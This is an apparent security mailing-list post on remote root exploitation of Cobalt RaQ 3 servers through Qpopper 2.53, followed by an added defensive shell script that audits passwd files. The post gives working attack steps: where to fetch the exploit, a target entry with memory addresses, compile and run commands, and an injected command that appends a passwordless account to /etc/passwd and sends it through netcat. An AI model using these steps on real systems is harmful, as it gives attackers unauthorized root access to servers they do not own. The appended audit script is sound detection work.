
[cobalt-security] Qpopper - remote root...



Hi,

If you want to exploit a Cobalt RaQ 3, grab the Qpopper 2.53 exploit from
http://www.hack.co.za/daem0n/pop/pop3/7350qpop.c, add the following line
to the "targets[]" structure:

	  { "Cobalt OS 5.0: qpopper-2.53", 0xBFFFD368, 0xbfffdc18 },

compile the exploit (gcc 7350qpop.c -o qpop-cobalt), and run it in the
following fashion...:

./qpop-cobalt <target-id-you-made> foobar@xxxxxxxxxxx user@xxxxxxxxxxxxx
echo owned::500:100:cracker:/:/bin/sh >>/etc/passwd 2>&1 >/dev/null | nc
sendmail-server.com 25

(user@xxxxxxxxxxxxx to, for example, gossi@xxxxxxxxxxxxxx, and
sendmail-server.com to a mail server you can send through).  You'll need
netcat installed on the box you are testing from.

That'll add a remote user (owned, no password) to the cobalt.

The attack doesn't require an account on the system - it simply needs you
to know an account on the system which 'pop3' is being used to retrieve
the mail of - I'd imagine this is a majority of accounts on Cobalts.

Regards,

-- 
gossi@xxxxxxxxxxxxxxx
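
Added example, not part of the original message: a host-side check for the artifact described above, a line appended to /etc/passwd with an empty password field and an interactive shell. The function name, the reason labels and every sample line except the `owned` entry quoted from the message are constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the original message): flag passwd entries that
# look like the account the message says gets appended.

# audit_passwd [FILE]: read a passwd-format file (stdin if omitted) and
# print one "user:reason" line per finding.
audit_passwd() {
    awk -F: '
        /^[ \t]*#/ || /^[ \t]*$/ { next }        # skip comments, blank lines
        NF != 7 { print $1 ":malformed-entry"; next }
        {
            # An empty shell field means the default shell, so it counts
            # as interactive; nologin and false do not.
            interactive = ($7 !~ /(nologin|false)$/)
            if ($2 == "" && interactive) { print $1 ":empty-password" }
            if ($3 ~ /^0+$/ && $1 != "root") { print $1 ":uid0-not-root" }
            if ($6 == "/" && $1 != "root" && interactive) {
                print $1 ":home-is-root-dir"
            }
        }
    ' "${1:--}"
}

# Constructed sample file; only the last line is taken from the message.
sample_passwd() {
    cat <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:2:2:daemon:/sbin:/sbin/nologin
admin:x:110:100:Admin:/home/admin:/bin/bash
owned::500:100:cracker:/:/bin/sh
EOF
}

# Demo run on the constructed sample.
sample_passwd | audit_passwd
```

On a live system, run `audit_passwd /etc/passwd` and compare the findings against a known-good copy of the file.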